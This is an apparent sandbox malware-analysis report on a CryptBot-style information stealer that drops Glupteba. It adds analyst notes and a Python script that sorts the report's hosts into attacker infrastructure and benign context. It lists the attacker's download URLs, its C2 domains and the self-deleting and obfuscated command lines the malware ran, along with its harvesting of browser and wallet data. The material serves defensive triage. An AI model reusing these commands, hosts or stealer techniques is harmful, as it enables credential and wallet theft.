Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW, 0_2_0040E340
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown HTTP traffic detected:
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
    Host: pacdpo22.top
    Content-Length: 73148
    Cache-Control: no-cache
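The URL and host strings in this section mix three kinds of thing: operator-controlled infrastructure (the .top domains and the 223.252.173.63 loader URL), public services the chain abuses for victim IP lookup and beaconing (ip-api.com, iplogger.org and its 2no.co short link), and strings the sample merely carried, such as DigiCert certificate URLs from the signed NSIS installer and default search-provider URLs copied out of the victim's browser database (default_webdata.db). The Python below, added as an example and not part of the Joe Sandbox report, runs a provenance-based triage over a quoted subset of these evidence lines (REPORT_EXCERPT; the POST/Host lines stand for the request header shown above) so that only operator-controlled hosts end up on a block list. The benign-suffix and abused-service lists, and the rule that anything sourced from default_webdata.db is victim data, are this example's own heuristics.

```python
"""Provenance-based triage of the URL/host strings listed above.

Added example, not part of the Joe Sandbox report. REPORT_EXCERPT quotes a
subset of the report's own evidence lines; the suffix lists and the
default_webdata.db rule are this example's heuristics, not Joe Sandbox logic.
"""
import re
from urllib.parse import urlsplit

REPORT_EXCERPT = r"""
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp String found in binary or memory: http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsonC:
Source: File.exe, 0000000A.00000002.321489177.0000000000409000.00000002.00020000.sdmp, File.exe.0.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 7yyqdBJVGf.exe, 00000000.00000003.296660042.0000000002E58000.00000004.00000001.sdmp String found in binary or memory: http://pacdpo22.top/index.php
Source: 7yyqdBJVGf.exe, 00000000.00000002.316458179.0000000005220000.00000004.00000001.sdmp String found in binary or memory: http://zukelx03.top/downfiles/lv.exe
Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7yyqdBJVGf.exe, 00000000.00000002.316164733.0000000002E60000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp String found in binary or memory: https://login.live.comXf;
Source: unknown DNS traffic detected: queries for: pacdpo22.top
Source: C:\Windows\SysWOW64\wscript.exe Domain query: iplogger.org
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com DNS query: name: ip-api.com
POST /index.php HTTP/1.1
Host: moreil02.top
"""

# Strings lifted from memory run URLs together; stop each one where the next "http(s)://" begins.
URL_RE = re.compile(r"https?://(?:(?!https?://)\S)+")
DNS_RE = re.compile(r"(?:queries for|Domain query|DNS query: name|Host): ([A-Za-z0-9.-]+)")
HOST_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+")  # applied after lower(); rejects overrun junk

# Explained by the sample's inputs (signed NSIS stub, Microsoft sign-in, the victim's search engines)
BENIGN_SUFFIXES = ("digicert.com", "nsis.sf.net", "live.com", "duckduckgo.com",
                   "ecosia.org", "yahoo.com", "google.com")
# Public services used for victim IP lookup and beaconing: alert on them, do not blindly block them
ABUSED_SERVICES = ("ip-api.com", "iplogger.org", "2no.co")


def _under(host: str, suffixes) -> bool:
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify_iocs(report_text: str) -> dict:
    """Bucket every host in the excerpt by provenance; return sorted lists per bucket."""
    buckets = {"attacker_infrastructure": set(), "abused_services": set(),
               "benign_context": set(), "attacker_urls": set()}
    for line in report_text.splitlines():
        from_browser_db = "default_webdata.db" in line  # copied from the victim's browser profile
        hits = [(u, urlsplit(u).netloc.lower()) for u in URL_RE.findall(line)]
        hits += [(None, h.lower()) for h in DNS_RE.findall(line)]
        for url, host in hits:
            if not HOST_RE.fullmatch(host):
                continue  # e.g. "login.live.comxf;" where the string scan ran past a terminator
            if from_browser_db or _under(host, BENIGN_SUFFIXES):
                buckets["benign_context"].add(host)
            elif _under(host, ABUSED_SERVICES):
                buckets["abused_services"].add(host)
            else:
                buckets["attacker_infrastructure"].add(host)
                if url:
                    buckets["attacker_urls"].add(url)
    return {k: sorted(v) for k, v in buckets.items()}
```

Run against the excerpt, only the four operator hosts land in attacker_infrastructure; duckduckgo.com and ecosia.org are kept out because their source is the dropped browser database, not because of the suffix list, which is the rule that generalises to other stealer reports.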

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 10_2_004044D1
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 10_2_004050F9
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0040B180 RegQueryValueExW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,CopyFileW, 0_2_0040B180

System Summary:

Submitted sample is a known malware sample
Source: C:\Windows\SysWOW64\cmd.exe Dropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wide range of industries is affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities. References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf ; https://securelist.com/operation-daybreak/75100/ ; https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Note: this hit is a hash lookup of one file dropped by cmd.exe against the RedDrip7 APT hash list, not a behavioural match on the submitted sample. Everything else in this report (the YARA hits, the lv.exe loader chain, the multipart POSTs to .top domains, the browser and wallet harvesting) describes commodity CryptBot delivering Glupteba, so the APT37 label should be read as a file shared with that dataset until the dropped file itself has been examined, not as attribution of this sample.
PE file contains section with special chars
Source: parted.exe.10.dr Static PE information: 7 sections whose names consist of special, non-printable characters (blank in this report)
Source: IntelRapid.exe.15.dr Static PE information: 7 sections whose names consist of special, non-printable characters (blank in this report)
Note: parted.exe (dropped to Temp\dislip) and IntelRapid.exe (dropped to Roaming\Intel Rapid and executed from there) share the IL86.pdb debug path and identical section statistics elsewhere in this report, consistent with IntelRapid.exe being a copy of parted.exe placed in a user-profile location typical of persistence.
Detected potential crypto function
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004140F0 0_2_004140F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00414800 0_2_00414800
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041BF2F 0_2_0041BF2F
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00434000 0_2_00434000
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041C194 0_2_0041C194
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00412210 0_2_00412210
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042E2EE 0_2_0042E2EE
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00411650 0_2_00411650
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00430B0C 0_2_00430B0C
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00422BF0 0_2_00422BF0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00420C29 0_2_00420C29
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00430C2C 0_2_00430C2C
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041BCFD 0_2_0041BCFD
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00413D80 0_2_00413D80
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00432FBD 0_2_00432FBD
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_03094340 0_2_03094340
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0309C3E4 0_2_0309C3E4
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_030B320D 0_2_030B320D
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0309C17F 0_2_0309C17F
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_0040737E 10_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406EFE 10_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004079A2 10_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004049A8 10_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9871 13_2_004E9871
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004EA81D 13_2_004EA81D
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004EA418 13_2_004EA418
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9551 13_2_004E9551
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9BE8 13_2_004E9BE8
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9FB0 13_2_004E9FB0
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process Stats: CPU usage > 98%
PE file contains strange resources
Source: lv[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lv[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lv[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: File.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: File.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: File.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wheezy.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wheezy.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Uses 32bit PE files
Source: 7yyqdBJVGf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 10_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E1B23 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx, 13_2_004E1B23
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E1FEA ExitWindowsEx, 13_2_004E1FEA
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: String function: 00417470 appears 50 times
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: String function: 0040FAF0 appears 56 times
Source: lv[1].exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.00268554688
Source: File.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.00268554688
Source: parted.exe.10.dr Static PE information: Section: ZLIB complexity 0.998956853693
Source: parted.exe.10.dr Static PE information: Section: ZLIB complexity 0.989397321429
Source: IntelRapid.exe.15.dr Static PE information: Section: ZLIB complexity 0.998956853693
Source: IntelRapid.exe.15.dr Static PE information: Section: ZLIB complexity 0.989397321429
Source: 7yyqdBJVGf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user\AppData\Roaming\aumaga Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@34/34@6/7
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E40C8 GetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,SetCurrentDirectoryA, 13_2_004E40C8
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E54CE GetDlgItem,GetDlgItem,ShowWindow,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA, 13_2_004E54CE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler Jump to behavior
Source: 7yyqdBJVGf.exe Virustotal: Detection: 52%
Source: 7yyqdBJVGf.exe ReversingLabs: Detection: 48%
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\7yyqdBJVGf.exe 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\File.exe Process created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Users\user\AppData\Local\Temp\File.exe Process created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Process created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Quegli.wav
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe 'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe'
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E1B23 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx, 13_2_004E1B23
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user~1\AppData\Local\Temp\kCFlwhS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004024FB CoCreateInstance, 10_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 10_2_004044D1
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Mutant created: \Sessions\1\BaseNamedObjects\{37529D08-A67E-40B3-B0F2-EB87331B47F5}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Files 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Wallet 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Chrome 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Opera 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Brave 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\files 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\_Chrome 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\_Opera 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \files_\_Brave 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\ 0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: >6C 0_2_00433590
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 7yyqdBJVGf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wextract.pdb source: wheezy.exe, wheezy.exe.10.dr
Source: Binary string: wextract.pdb0lbp source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
Source: Binary string: C:\sojeli.pdb source: 7yyqdBJVGf.exe
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: IntelRapid.exe
Source: Binary string: acppage.pdb source: acppage.dll.10.dr
Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 7yyqdBJVGf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Unpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack
Obfuscated command line found
